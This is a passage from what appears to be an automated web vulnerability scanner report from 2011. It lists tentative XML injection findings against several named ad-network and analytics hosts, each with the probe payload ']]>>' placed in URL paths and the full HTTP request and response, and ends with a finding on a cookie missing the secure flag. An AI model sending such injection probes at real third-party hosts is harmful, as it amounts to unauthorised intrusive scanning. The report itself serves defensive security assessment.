Proxy-Connection: keep-alive
Referer: http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 11:10:23 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.58. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/adapters/vpaid_adapter.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf]]>>/v4/adapters/vpaid_adapter.swf HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 5ECBD297348303A0
x-amz-id-2: gSSquTbfE2eoArj+eakHhLlKBULnBgd6IbnbBgIHR/zNRg9fE15R/sUiVb/YMnhI
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 04 Sep 2011 03:20:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5ECBD297348303A0</RequestId><HostId>gSSquTbfE2eoArj+eakHhLlKBULnBgd6IbnbBgIHR/zNRg9fE1
...[SNIP]...

10.59. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/adapters/vpaid_adapter.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf/v4]]>>/adapters/vpaid_adapter.swf HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: CCEA8FA5F0509839
x-amz-id-2: RMFy75B/bxKmzhap6ng5WEVZ9T581flRrJCSzdybh1RrlIgd9JmmccjjROP8ngMP
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 04 Sep 2011 03:20:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CCEA8FA5F0509839</RequestId><HostId>RMFy75B/bxKmzhap6ng5WEVZ9T581flRrJCSzdybh1RrlIgd9J
...[SNIP]...

10.60. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/adapters/vpaid_adapter.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf/v4/adapters]]>>/vpaid_adapter.swf HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: B9199AE8247146EB
x-amz-id-2: 1L1A0ypgcxN1k24aG6xAqZ/i0sBkSIK9pmgTGOsPLtEWLM9CiR9GwAUzXyoWNnTH
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 04 Sep 2011 03:20:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B9199AE8247146EB</RequestId><HostId>1L1A0ypgcxN1k24aG6xAqZ/i0sBkSIK9pmgTGOsPLtEWLM9CiR
...[SNIP]...

10.61. http://vox-static.liverail.com/swf/v4/adapters/vpaid_adapter.swf [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/adapters/vpaid_adapter.swf

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf/v4/adapters/vpaid_adapter.swf]]>> HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: E4740C3F8BC7FA8F
x-amz-id-2: 7+A/jj4fbwrNsH0cdMtIpBTbrTLGjRc14WfAzE2JHMZ6fw28Ox/NQ8WkAnacLmKX
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 04 Sep 2011 03:20:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E4740C3F8BC7FA8F</RequestId><HostId>7+A/jj4fbwrNsH0cdMtIpBTbrTLGjRc14WfAzE2JHMZ6fw28Ox
...[SNIP]...

10.62. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/admanager.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf]]>>/v4/admanager.swf HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: D36887FA0588921C
x-amz-id-2: cPy2/As6dTFCn01okkHWSwvHzM2smS5i2Ok8yfqt4ueUzmEAvrpX0acQawSTurkQ
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 04 Sep 2011 02:37:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D36887FA0588921C</RequestId><HostId>cPy2/As6dTFCn01okkHWSwvHzM2smS5i2Ok8yfqt4ueUzmEAvr
...[SNIP]...

10.63. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/admanager.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf/v4]]>>/admanager.swf HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 07595A89F83D0E9D
x-amz-id-2: q00lLD5mziILQedOmxwNUCD+4satyzuI9gIAChX72/WDz6cta7MMzGK4A5q07bfm
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 04 Sep 2011 02:37:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>07595A89F83D0E9D</RequestId><HostId>q00lLD5mziILQedOmxwNUCD+4satyzuI9gIAChX72/WDz6cta7
...[SNIP]...

10.64. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/admanager.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf/v4/admanager.swf]]>> HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: BC194BF70122CBA2
x-amz-id-2: Oe+U3sC8+WyKHV/FcjgfS9aG8MAEfRu5u0QX5ApsrcRox+tYJN2uvFPys+ofyB/J
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 04 Sep 2011 02:38:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BC194BF70122CBA2</RequestId><HostId>Oe+U3sC8+WyKHV/FcjgfS9aG8MAEfRu5u0QX5ApsrcRox+tYJN
...[SNIP]...

10.65. http://web.adblade.com/clicks.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://web.adblade.com
Path:   /clicks.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /clicks.php]]>> HTTP/1.1
Host: web.adblade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 04:23:27 GMT
Server: lighttpd/1.4.21

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.66. http://web.adblade.com/impsc.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://web.adblade.com
Path:   /impsc.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /impsc.php]]>>?cid=1083-2742610312&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 02:40:35 GMT
Server: lighttpd/1.4.23

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.67. http://www.nexac.com/nai_optout.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nexac.com
Path:   /nai_optout.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /nai_optout.php]]>>?nocache=0.8033839 HTTP/1.1
Host: www.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 11:18:32 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.68. http://www.nexac.com/nai_status.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nexac.com
Path:   /nai_status.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /nai_status.php]]>>?nocache=0.4737404 HTTP/1.1
Host: www.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 11:03:18 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.69. http://www9.effectivemeasure.net/v4/em4.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www9.effectivemeasure.net
Path:   /v4/em4.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /v4]]>>/em4.swf HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180135_458

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=7200, public
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 02:27:12 GMT
Server: C10

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.70. http://www9.effectivemeasure.net/v4/em4.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www9.effectivemeasure.net
Path:   /v4/em4.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /v4/em4.swf]]>> HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180135_458

Response

HTTP/1.1 404 Not Found
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 02:27:12 GMT
Server: C10

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.71. http://www9.effectivemeasure.net/v4/em_ck_img [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_ck_img

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /v4]]>>/em_ck_img?hl=1&r=0.32810356677509844 HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180135_458

Response

HTTP/1.1 404 Not Found
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 02:28:32 GMT
Server: C10

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.72. http://www9.effectivemeasure.net/v4/em_dimg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_dimg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /v4]]>>/em_dimg?flag=2&v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180&vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180&hl=&sv=-1&pv=&pn=&p=aHR0cDovL3d3dy5uYXRpb25tdWx0aW1lZGlhLmNvbS8%3D&r=aHR0cDovL3d3dy5nb29nbGUuY29tL3NlYXJjaD9zb3VyY2VpZD1jaHJvbWUmaWU9VVRGLTgmcT1iYW5na29rK3RoYWlsYW5kK25ld3M%3D&f=1&ns=_em&rnd=0.43564966856501997&u=cat2_id%3D541.552057%26&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180135_458

Response

HTTP/1.1 404 Not Found
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 02:34:33 GMT
Server: C10

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.73. http://www9.effectivemeasure.net/v4/em_js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /v4]]>>/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5uYXRpb25tdWx0aW1lZGlhLmNvbS8%3D&r=aHR0cDovL3d3dy5nb29nbGUuY29tL3NlYXJjaD9zb3VyY2VpZD1jaHJvbWUmaWU9VVRGLTgmcT1iYW5na29rK3RoYWlsYW5kK25ld3M%3D&f=1&ns=_em&rnd=0.828509088139981&u=cat2_id%3D541.552057%26&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 02:33:11 GMT
Server: C10

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

11. SSL cookie without secure flag set  previous  next
There are 2 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


11.1. https://twitter.com/home  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://twitter.com
Path:   /home

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:21:56 GMT
Server: hi
Status: 302 Found
Location: https://twitter.com/login?redirect_after_login=%2Fhome
X-Runtime: 0.00193
Content-Type: text/html; charset=utf-8
Content-Length: 120
Cache-Control: no-cache, max-age=300
